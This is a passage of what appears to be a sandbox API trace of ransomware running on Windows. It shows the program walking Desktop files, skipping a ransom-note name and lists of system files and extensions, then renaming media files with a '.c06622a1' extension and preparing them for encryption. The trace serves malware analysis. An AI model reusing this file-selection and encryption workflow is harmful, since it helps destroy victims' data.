HALPmcxz\\Desktop\\9STobsEsIlXi_C.gif") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9STobsEsIlXi_C.gif" [0147.571] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9STobsEsIlXi_C.gif") returned 0x3c [0147.571] wcscpy (in: _Dest=0x44e00f8, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0147.571] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9STobsEsIlXi_C.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9stobsesilxi_c.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9STobsEsIlXi_C.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9stobsesilxi_c.gif.c06622a1"), dwFlags=0x8) returned 1 [0147.574] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9STobsEsIlXi_C.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9stobsesilxi_c.gif.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x644 [0147.574] CreateIoCompletionPort (FileHandle=0x644, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0147.574] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4700020 [0147.580] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5c7f5fb [0147.580] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5dde970d [0147.580] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x766ee512 [0147.580] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x43283631 [0147.580] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2303a35a [0147.580] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1b85af76 [0147.580] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x318ae0fb [0147.580] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3fc640ed [0147.583] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4700094, Length=0x80) returned 0xf42783d [0147.583] RtlComputeCrc32 (PartialCrc=0x783d, Buffer=0x4700094, Length=0x80) returned 0x1c9feb50 [0147.583] RtlComputeCrc32 (PartialCrc=0xeb50, Buffer=0x4700094, Length=0x80) returned 0x14688b [0147.583] RtlComputeCrc32 (PartialCrc=0x688b, Buffer=0x4700094, Length=0x80) returned 0x3b93c0c9 [0147.583] RtlComputeCrc32 (PartialCrc=0xc0c9, Buffer=0x4700094, Length=0x80) returned 0xe94f64b5 [0147.583] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4700020) returned 1 [0147.583] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0147.584] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0147.584] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x214069b0, ftCreationTime.dwHighDateTime=0x1d5e77f, ftLastAccessTime.dwLowDateTime=0x9889800, ftLastAccessTime.dwHighDateTime=0x1d5da60, ftLastWriteTime.dwLowDateTime=0x9889800, ftLastWriteTime.dwHighDateTime=0x1d5da60, nFileSizeHigh=0x0, nFileSizeLow=0x9981, dwReserved0=0x0, dwReserved1=0x0, cFileName="9ToKo5Bm3mR9l4.mp4", cAlternateFileName="9TOKO5~1.MP4")) returned 1 [0147.584] _wcsicmp (_Str1="9ToKo5Bm3mR9l4.mp4", _Str2="README.c06622a1.TXT") returned -57 [0147.584] wcsstr (_Str="9ToKo5Bm3mR9l4.mp4", _SubStr="README") returned 0x0 [0147.584] _wcsicmp (_Str1="autorun.inf", _Str2="9ToKo5Bm3mR9l4.mp4") returned 40 [0147.584] wcslen (_String="autorun.inf") returned 0xb [0147.584] _wcsicmp (_Str1="boot.ini", _Str2="9ToKo5Bm3mR9l4.mp4") returned 41 [0147.584] wcslen (_String="boot.ini") returned 0x8 [0147.584] _wcsicmp (_Str1="bootfont.bin", _Str2="9ToKo5Bm3mR9l4.mp4") returned 41 [0147.584] wcslen (_String="bootfont.bin") returned 0xc [0147.584] _wcsicmp (_Str1="bootsect.bak", _Str2="9ToKo5Bm3mR9l4.mp4") returned 41 [0147.584] wcslen (_String="bootsect.bak") returned 0xc [0147.584] _wcsicmp (_Str1="desktop.ini", _Str2="9ToKo5Bm3mR9l4.mp4") returned 43 [0147.584] wcslen (_String="desktop.ini") returned 0xb [0147.584] _wcsicmp (_Str1="iconcache.db", _Str2="9ToKo5Bm3mR9l4.mp4") returned 48 [0147.584] wcslen (_String="iconcache.db") returned 0xc [0147.584] _wcsicmp (_Str1="ntldr", _Str2="9ToKo5Bm3mR9l4.mp4") returned 53 [0147.584] wcslen (_String="ntldr") returned 0x5 [0147.584] _wcsicmp (_Str1="ntuser.dat", _Str2="9ToKo5Bm3mR9l4.mp4") returned 53 [0147.584] wcslen (_String="ntuser.dat") returned 0xa [0147.584] _wcsicmp (_Str1="ntuser.dat.log", _Str2="9ToKo5Bm3mR9l4.mp4") returned 53 [0147.584] wcslen (_String="ntuser.dat.log") returned 0xe [0147.584] _wcsicmp (_Str1="ntuser.ini", _Str2="9ToKo5Bm3mR9l4.mp4") returned 53 [0147.584] wcslen (_String="ntuser.ini") returned 0xa [0147.584] _wcsicmp (_Str1="thumbs.db", _Str2="9ToKo5Bm3mR9l4.mp4") returned 59 [0147.584] wcslen (_String="thumbs.db") returned 0x9 [0147.584] _wcsicmp (_Str1="386", _Str2="mp4") returned -58 [0147.584] wcslen (_String="386") returned 0x3 [0147.585] _wcsicmp (_Str1="adv", _Str2="mp4") returned -12 [0147.585] wcslen (_String="adv") returned 0x3 [0147.585] _wcsicmp (_Str1="ani", _Str2="mp4") returned -12 [0147.585] wcslen (_String="ani") returned 0x3 [0147.585] _wcsicmp (_Str1="bat", _Str2="mp4") returned -11 [0147.585] wcslen (_String="bat") returned 0x3 [0147.585] _wcsicmp (_Str1="bin", _Str2="mp4") returned -11 [0147.585] wcslen (_String="bin") returned 0x3 [0147.585] _wcsicmp (_Str1="cab", _Str2="mp4") returned -10 [0147.585] wcslen (_String="cab") returned 0x3 [0147.585] _wcsicmp (_Str1="cmd", _Str2="mp4") returned -10 [0147.585] wcslen (_String="cmd") returned 0x3 [0147.585] _wcsicmp (_Str1="com", _Str2="mp4") returned -10 [0147.585] wcslen (_String="com") returned 0x3 [0147.585] _wcsicmp (_Str1="cpl", _Str2="mp4") returned -10 [0147.585] wcslen (_String="cpl") returned 0x3 [0147.585] _wcsicmp (_Str1="cur", _Str2="mp4") returned -10 [0147.585] wcslen (_String="cur") returned 0x3 [0147.585] _wcsicmp (_Str1="deskthemepack", _Str2="mp4") returned -9 [0147.585] wcslen (_String="deskthemepack") returned 0xd [0147.585] _wcsicmp (_Str1="diagcab", _Str2="mp4") returned -9 [0147.585] wcslen (_String="diagcab") returned 0x7 [0147.585] _wcsicmp (_Str1="diagcfg", _Str2="mp4") returned -9 [0147.585] wcslen (_String="diagcfg") returned 0x7 [0147.585] _wcsicmp (_Str1="diagpkg", _Str2="mp4") returned -9 [0147.585] wcslen (_String="diagpkg") returned 0x7 [0147.585] _wcsicmp (_Str1="dll", _Str2="mp4") returned -9 [0147.585] wcslen (_String="dll") returned 0x3 [0147.585] _wcsicmp (_Str1="drv", _Str2="mp4") returned -9 [0147.585] wcslen (_String="drv") returned 0x3 [0147.585] _wcsicmp (_Str1="exe", _Str2="mp4") returned -8 [0147.586] wcslen (_String="exe") returned 0x3 [0147.586] _wcsicmp (_Str1="hlp", _Str2="mp4") returned -5 [0147.586] wcslen (_String="hlp") returned 0x3 [0147.586] _wcsicmp (_Str1="icl", _Str2="mp4") returned -4 [0147.586] wcslen (_String="icl") returned 0x3 [0147.586] _wcsicmp (_Str1="icns", _Str2="mp4") returned -4 [0147.586] wcslen (_String="icns") returned 0x4 [0147.586] _wcsicmp (_Str1="ico", _Str2="mp4") returned -4 [0147.586] wcslen (_String="ico") returned 0x3 [0147.586] _wcsicmp (_Str1="ics", _Str2="mp4") returned -4 [0147.586] wcslen (_String="ics") returned 0x3 [0147.586] _wcsicmp (_Str1="idx", _Str2="mp4") returned -4 [0147.586] wcslen (_String="idx") returned 0x3 [0147.586] _wcsicmp (_Str1="ldf", _Str2="mp4") returned -1 [0147.586] wcslen (_String="ldf") returned 0x3 [0147.586] _wcsicmp (_Str1="lnk", _Str2="mp4") returned -1 [0147.586] wcslen (_String="lnk") returned 0x3 [0147.586] _wcsicmp (_Str1="mod", _Str2="mp4") returned -1 [0147.586] wcslen (_String="mod") returned 0x3 [0147.586] _wcsicmp (_Str1="mpa", _Str2="mp4") returned 45 [0147.586] wcslen (_String="mpa") returned 0x3 [0147.586] _wcsicmp (_Str1="msc", _Str2="mp4") returned 3 [0147.586] wcslen (_String="msc") returned 0x3 [0147.586] _wcsicmp (_Str1="msp", _Str2="mp4") returned 3 [0147.586] wcslen (_String="msp") returned 0x3 [0147.586] _wcsicmp (_Str1="msstyles", _Str2="mp4") returned 3 [0147.586] wcslen (_String="msstyles") returned 0x8 [0147.586] _wcsicmp (_Str1="msu", _Str2="mp4") returned 3 [0147.586] wcslen (_String="msu") returned 0x3 [0147.586] _wcsicmp (_Str1="nls", _Str2="mp4") returned 1 [0147.586] wcslen (_String="nls") returned 0x3 [0147.586] _wcsicmp (_Str1="nomedia", _Str2="mp4") returned 1 [0147.587] wcslen (_String="nomedia") returned 0x7 [0147.587] _wcsicmp (_Str1="ocx", _Str2="mp4") returned 2 [0147.587] wcslen (_String="ocx") returned 0x3 [0147.587] _wcsicmp (_Str1="prf", _Str2="mp4") returned 3 [0147.587] wcslen (_String="prf") returned 0x3 [0147.587] _wcsicmp (_Str1="ps1", _Str2="mp4") returned 3 [0147.587] wcslen (_String="ps1") returned 0x3 [0147.587] _wcsicmp (_Str1="rom", _Str2="mp4") returned 5 [0147.587] wcslen (_String="rom") returned 0x3 [0147.587] _wcsicmp (_Str1="rtp", _Str2="mp4") returned 5 [0147.587] wcslen (_String="rtp") returned 0x3 [0147.587] _wcsicmp (_Str1="scr", _Str2="mp4") returned 6 [0147.587] wcslen (_String="scr") returned 0x3 [0147.587] _wcsicmp (_Str1="shs", _Str2="mp4") returned 6 [0147.587] wcslen (_String="shs") returned 0x3 [0147.587] _wcsicmp (_Str1="spl", _Str2="mp4") returned 6 [0147.587] wcslen (_String="spl") returned 0x3 [0147.587] _wcsicmp (_Str1="sys", _Str2="mp4") returned 6 [0147.587] wcslen (_String="sys") returned 0x3 [0147.587] _wcsicmp (_Str1="theme", _Str2="mp4") returned 7 [0147.587] wcslen (_String="theme") returned 0x5 [0147.587] _wcsicmp (_Str1="themepack", _Str2="mp4") returned 7 [0147.587] wcslen (_String="themepack") returned 0x9 [0147.587] _wcsicmp (_Str1="wpx", _Str2="mp4") returned 10 [0147.587] wcslen (_String="wpx") returned 0x3 [0147.587] _wcsicmp (_Str1="lock", _Str2="mp4") returned -1 [0147.587] wcslen (_String="lock") returned 0x4 [0147.587] _wcsicmp (_Str1="key", _Str2="mp4") returned -2 [0147.587] wcslen (_String="key") returned 0x3 [0147.587] _wcsicmp (_Str1="hta", _Str2="mp4") returned -5 [0147.587] wcslen (_String="hta") returned 0x3 [0147.588] _wcsicmp (_Str1="msi", _Str2="mp4") returned 3 [0147.588] wcslen (_String="msi") returned 0x3 [0147.588] _wcsicmp (_Str1="pdb", _Str2="mp4") returned 3 [0147.588] wcslen (_String="pdb") returned 0x3 [0147.588] _wcsicmp (_Str1="sql", _Str2="mp4") returned 6 [0147.588] wcslen (_String="sql") returned 0x3 [0147.588] _wcsicmp (_Str1="sqlite", _Str2="mp4") returned 6 [0147.588] wcslen (_String="sqlite") returned 0x6 [0147.588] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0147.588] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0147.588] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0147.588] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0147.588] wcscpy (in: _Dest=0x44d00cc, _Source="9ToKo5Bm3mR9l4.mp4" | out: _Dest="9ToKo5Bm3mR9l4.mp4") returned="9ToKo5Bm3mR9l4.mp4" [0147.588] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9ToKo5Bm3mR9l4.mp4", dwFileAttributes=0x80) returned 1 [0147.588] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9ToKo5Bm3mR9l4.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9toko5bm3mr9l4.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x624 [0147.588] SetFilePointerEx (in: hFile=0x624, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.589] ReadFile (in: hFile=0x624, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0147.589] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x17ad8eac [0147.589] RtlComputeCrc32 (PartialCrc=0x8eac, Buffer=0x3feb74, Length=0x80) returned 0x647c6878 [0147.589] RtlComputeCrc32 (PartialCrc=0x6878, Buffer=0x3feb74, Length=0x80) returned 0xa98acb26 [0147.589] RtlComputeCrc32 (PartialCrc=0xcb26, Buffer=0x3feb74, Length=0x80) returned 0xaa3296e5 [0147.589] RtlComputeCrc32 (PartialCrc=0x96e5, Buffer=0x3feb74, Length=0x80) returned 0x793f34cd [0147.589] CloseHandle (hObject=0x624) returned 1 [0147.589] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0147.590] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9ToKo5Bm3mR9l4.mp4" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9ToKo5Bm3mR9l4.mp4") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9ToKo5Bm3mR9l4.mp4" [0147.590] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9ToKo5Bm3mR9l4.mp4") returned 0x3c [0147.590] wcscpy (in: _Dest=0x44e00f8, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0147.590] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9ToKo5Bm3mR9l4.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9toko5bm3mr9l4.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9ToKo5Bm3mR9l4.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9toko5bm3mr9l4.mp4.c06622a1"), dwFlags=0x8) returned 1 [0147.593] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9ToKo5Bm3mR9l4.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9toko5bm3mr9l4.mp4.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x624 [0147.593] CreateIoCompletionPort (FileHandle=0x624, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0147.593] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4820020 [0147.599] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6459efef [0147.599] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x645928af [0147.599] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x27a7af6 [0147.599] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x30b17699 [0147.599] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x91e872f [0147.599] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1c82f765 [0147.599] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4363a626 [0147.599] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7ee0b5f2 [0147.602] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4820094, Length=0x80) returned 0xeb9671e2 [0147.602] RtlComputeCrc32 (PartialCrc=0x71e2, Buffer=0x4820094, Length=0x80) returned 0x7b56a5bd [0147.602] RtlComputeCrc32 (PartialCrc=0xa5bd, Buffer=0x4820094, Length=0x80) returned 0xe535cad3 [0147.602] RtlComputeCrc32 (PartialCrc=0xcad3, Buffer=0x4820094, Length=0x80) returned 0x8d94075 [0147.602] RtlComputeCrc32 (PartialCrc=0x4075, Buffer=0x4820094, Length=0x80) returned 0x6c5fcff7 [0147.602] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4820020) returned 1 [0147.602] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0147.602] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0147.602] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bb3c80, ftCreationTime.dwHighDateTime=0x1d5e023, ftLastAccessTime.dwLowDateTime=0xe9b32660, ftLastAccessTime.dwHighDateTime=0x1d5e736, ftLastWriteTime.dwLowDateTime=0xe9b32660, ftLastWriteTime.dwHighDateTime=0x1d5e736, nFileSizeHigh=0x0, nFileSizeLow=0x18407, dwReserved0=0x0, dwReserved1=0x0, cFileName="A1IUZFLl6juvAhJaCm.mkv", cAlternateFileName="A1IUZF~1.MKV")) returned 1 [0147.602] _wcsicmp (_Str1="A1IUZFLl6juvAhJaCm.mkv", _Str2="README.c06622a1.TXT") returned -17 [0147.603] wcsstr (_Str="A1IUZFLl6juvAhJaCm.mkv", _SubStr="README") returned 0x0 [0147.603] _wcsicmp (_Str1="autorun.inf", _Str2="A1IUZFLl6juvAhJaCm.mkv") returned 68 [0147.603] wcslen (_String="autorun.inf") returned 0xb [0147.603] _wcsicmp (_Str1="boot.ini", _Str2="A1IUZFLl6juvAhJaCm.mkv") returned 1 [0147.603] wcslen (_String="boot.ini") returned 0x8 [0147.603] _wcsicmp (_Str1="bootfont.bin", _Str2="A1IUZFLl6juvAhJaCm.mkv") returned 1 [0147.603] wcslen (_String="bootfont.bin") returned 0xc [0147.603] _wcsicmp (_Str1="bootsect.bak", _Str2="A1IUZFLl6juvAhJaCm.mkv") returned 1 [0147.603] wcslen (_String="bootsect.bak") returned 0xc [0147.603] _wcsicmp (_Str1="desktop.ini", _Str2="A1IUZFLl6juvAhJaCm.mkv") returned 3 [0147.603] wcslen (_String="desktop.ini") returned 0xb [0147.603] _wcsicmp (_Str1="iconcache.db", _Str2="A1IUZFLl6juvAhJaCm.mkv") returned 8 [0147.603] wcslen (_String="iconcache.db") returned 0xc [0147.603] _wcsicmp (_Str1="ntldr", _Str2="A1IUZFLl6juvAhJaCm.mkv") returned 13 [0147.603] wcslen (_String="ntldr") returned 0x5 [0147.603] _wcsicmp (_Str1="ntuser.dat", _Str2="A1IUZFLl6juvAhJaCm.mkv") returned 13 [0147.603] wcslen (_String="ntuser.dat") returned 0xa [0147.603] _wcsicmp (_Str1="ntuser.dat.log", _Str2="A1IUZFLl6juvAhJaCm.mkv") returned 13 [0147.603] wcslen (_String="ntuser.dat.log") returned 0xe [0147.603] _wcsicmp (_Str1="ntuser.ini", _Str2="A1IUZFLl6juvAhJaCm.mkv") returned 13 [0147.603] wcslen (_String="ntuser.ini") returned 0xa [0147.603] _wcsicmp (_Str1="thumbs.db", _Str2="A1IUZFLl6juvAhJaCm.mkv") returned 19 [0147.603] wcslen (_String="thumbs.db") returned 0x9 [0147.603] _wcsicmp (_Str1="386", _Str2="mkv") returned -58 [0147.603] wcslen (_String="386") returned 0x3 [0147.603] _wcsicmp (_Str1="adv", _Str2="mkv") returned -12 [0147.603] wcslen (_String="adv") returned 0x3 [0147.603] _wcsicmp (_Str1="ani", _Str2="mkv") returned -12 [0147.603] wcslen (_String="ani") returned 0x3 [0147.603] _wcsicmp (_Str1="bat", _Str2="mkv") returned -11 [0147.604] wcslen (_String="bat") returned 0x3 [0147.604] _wcsicmp (_Str1="bin", _Str2="mkv") returned -11 [0147.604] wcslen (_String="bin") returned 0x3 [0147.604] _wcsicmp (_Str1="cab", _Str2="mkv") returned -10 [0147.604] wcslen (_String="cab") returned 0x3 [0147.604] _wcsicmp (_Str1="cmd", _Str2="mkv") returned -10 [0147.604] wcslen (_String="cmd") returned 0x3 [0147.604] _wcsicmp (_Str1="com", _Str2="mkv") returned -10 [0147.604] wcslen (_String="com") returned 0x3 [0147.604] _wcsicmp (_Str1="cpl", _Str2="mkv") returned -10 [0147.604] wcslen (_String="cpl") returned 0x3 [0147.604] _wcsicmp (_Str1="cur", _Str2="mkv") returned -10 [0147.604] wcslen (_String="cur") returned 0x3 [0147.604] _wcsicmp (_Str1="deskthemepack", _Str2="mkv") returned -9 [0147.604] wcslen (_String="deskthemepack") returned 0xd [0147.604] _wcsicmp (_Str1="diagcab", _Str2="mkv") returned -9 [0147.604] wcslen (_String="diagcab") returned 0x7 [0147.604] _wcsicmp (_Str1="diagcfg", _Str2="mkv") returned -9 [0147.604] wcslen (_String="diagcfg") returned 0x7 [0147.604] _wcsicmp (_Str1="diagpkg", _Str2="mkv") returned -9 [0147.604] wcslen (_String="diagpkg") returned 0x7 [0147.604] _wcsicmp (_Str1="dll", _Str2="mkv") returned -9 [0147.604] wcslen (_String="dll") returned 0x3 [0147.604] _wcsicmp (_Str1="drv", _Str2="mkv") returned -9 [0147.604] wcslen (_String="drv") returned 0x3 [0147.604] _wcsicmp (_Str1="exe", _Str2="mkv") returned -8 [0147.604] wcslen (_String="exe") returned 0x3 [0147.604] _wcsicmp (_Str1="hlp", _Str2="mkv") returned -5 [0147.604] wcslen (_String="hlp") returned 0x3 [0147.604] _wcsicmp (_Str1="icl", _Str2="mkv") returned -4 [0147.604] wcslen (_String="icl") returned 0x3 [0147.605] _wcsicmp (_Str1="icns", _Str2="mkv") returned -4 [0147.605] wcslen (_String="icns") returned 0x4 [0147.605] _wcsicmp (_Str1="ico", _Str2="mkv") returned -4 [0147.605] wcslen (_String="ico") returned 0x3 [0147.605] _wcsicmp (_Str1="ics", _Str2="mkv") returned -4 [0147.605] wcslen (_String="ics") returned 0x3 [0147.605] _wcsicmp (_Str1="idx", _Str2="mkv") returned -4 [0147.605] wcslen (_String="idx") returned 0x3 [0147.605] _wcsicmp (_Str1="ldf", _Str2="mkv") returned -1 [0147.605] wcslen (_String="ldf") returned 0x3 [0147.605] _wcsicmp (_Str1="lnk", _Str2="mkv") returned -1 [0147.605] wcslen (_String="lnk") returned 0x3 [0147.605] _wcsicmp (_Str1="mod", _Str2="mkv") returned 4 [0147.605] wcslen (_String="mod") returned 0x3 [0147.605] _wcsicmp (_Str1="mpa", _Str2="mkv") returned 5 [0147.605] wcslen (_String="mpa") returned 0x3 [0147.605] _wcsicmp (_Str1="msc", _Str2="mkv") returned 8 [0147.605] wcslen (_String="msc") returned 0x3 [0147.605] _wcsicmp (_Str1="msp", _Str2="mkv") returned 8 [0147.605] wcslen (_String="msp") returned 0x3 [0147.605] _wcsicmp (_Str1="msstyles", _Str2="mkv") returned 8 [0147.605] wcslen (_String="msstyles") returned 0x8 [0147.605] _wcsicmp (_Str1="msu", _Str2="mkv") returned 8 [0147.605] wcslen (_String="msu") returned 0x3 [0147.605] _wcsicmp (_Str1="nls", _Str2="mkv") returned 1 [0147.605] wcslen (_String="nls") returned 0x3 [0147.605] _wcsicmp (_Str1="nomedia", _Str2="mkv") returned 1 [0147.605] wcslen (_String="nomedia") returned 0x7 [0147.605] _wcsicmp (_Str1="ocx", _Str2="mkv") returned 2 [0147.605] wcslen (_String="ocx") returned 0x3 [0147.605] _wcsicmp (_Str1="prf", _Str2="mkv") returned 3 [0147.606] wcslen (_String="prf") returned 0x3 [0147.606] _wcsicmp (_Str1="ps1", _Str2="mkv") returned 3 [0147.606] wcslen (_String="ps1") returned 0x3 [0147.606] _wcsicmp (_Str1="rom", _Str2="mkv") returned 5 [0147.606] wcslen (_String="rom") returned 0x3 [0147.606] _wcsicmp (_Str1="rtp", _Str2="mkv") returned 5 [0147.606] wcslen (_String="rtp") returned 0x3 [0147.606] _wcsicmp (_Str1="scr", _Str2="mkv") returned 6 [0147.606] wcslen (_String="scr") returned 0x3 [0147.606] _wcsicmp (_Str1="shs", _Str2="mkv") returned 6 [0147.606] wcslen (_String="shs") returned 0x3 [0147.606] _wcsicmp (_Str1="spl", _Str2="mkv") returned 6 [0147.606] wcslen (_String="spl") returned 0x3 [0147.606] _wcsicmp (_Str1="sys", _Str2="mkv") returned 6 [0147.606] wcslen (_String="sys") returned 0x3 [0147.606] _wcsicmp (_Str1="theme", _Str2="mkv") returned 7 [0147.606] wcslen (_String="theme") returned 0x5 [0147.606] _wcsicmp (_Str1="themepack", _Str2="mkv") returned 7 [0147.606] wcslen (_String="themepack") returned 0x9 [0147.606] _wcsicmp (_Str1="wpx", _Str2="mkv") returned 10 [0147.606] wcslen (_String="wpx") returned 0x3 [0147.606] _wcsicmp (_Str1="lock", _Str2="mkv") returned -1 [0147.606] wcslen (_String="lock") returned 0x4 [0147.606] _wcsicmp (_Str1="key", _Str2="mkv") returned -2 [0147.606] wcslen (_String="key") returned 0x3 [0147.606] _wcsicmp (_Str1="hta", _Str2="mkv") returned -5 [0147.606] wcslen (_String="hta") returned 0x3 [0147.606] _wcsicmp (_Str1="msi", _Str2="mkv") returned 8 [0147.606] wcslen (_String="msi") returned 0x3 [0147.606] _wcsicmp (_Str1="pdb", _Str2="mkv") returned 3 [0147.606] wcslen (_String="pdb") returned 0x3 [0147.607] _wcsicmp (_Str1="sql", _Str2="mkv") returned 6 [0147.607] wcslen (_String="sql") returned 0x3 [0147.607] _wcsicmp (_Str1="sqlite", _Str2="mkv") returned 6 [0147.607] wcslen (_String="sqlite") returned 0x6 [0147.607] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0147.607] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0147.607] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0147.607] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0147.607] wcscpy (in: _Dest=0x44d00cc, _Source="A1IUZFLl6juvAhJaCm.mkv" | out: _Dest="A1IUZFLl6juvAhJaCm.mkv") returned="A1IUZFLl6juvAhJaCm.mkv" [0147.607] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A1IUZFLl6juvAhJaCm.mkv", dwFileAttributes=0x80) returned 1 [0147.607] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A1IUZFLl6juvAhJaCm.mkv" (normalized: "c:\\users\\5p5nrgjn0js 